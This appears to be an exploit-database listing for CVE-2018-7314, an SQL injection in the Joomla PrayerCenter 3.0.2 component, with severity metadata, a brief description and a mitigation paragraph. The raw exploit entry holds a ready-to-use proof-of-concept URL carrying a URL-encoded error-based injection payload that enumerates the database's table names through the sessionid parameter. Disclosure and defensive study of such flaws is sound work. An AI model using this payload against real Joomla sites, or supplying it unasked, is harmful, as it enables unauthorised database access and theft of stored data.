header-logo
Suggest Exploit
vendor:
PrayerCenter
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: PrayerCenter
Affected Version From: 3.0.2
Affected Version To: 3.0.2
Patch Exists: YES
Related CWE: CVE-2018-7314
CPE: a:mlwebtechnologies:prayercenter:3.0.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component PrayerCenter 3.0.2 – SQL Injection

Joomla! Component PrayerCenter 3.0.2 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands on the underlying database, potentially allowing them to access or modify sensitive data.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component PrayerCenter 3.0.2 - SQL Injection
# Dork: N/A
# Date: 22.02.2018
# Vendor Homepage: http://www.mlwebtechnologies.com/
# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/prayercenter/
# Software Download: http://mlwebtechnologies.github.io/PrayerCenter/
# Software Download: https://github.com/MLWebTechnologies/PrayerCenter/releases/download/3.0.2/PrayerCenter302Unzip1st.zip
# Version: 3.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7314
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=[SQL]
# 
# %31%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69
# 
# # # #

Navigation

Suggest Exploit

Services By CQR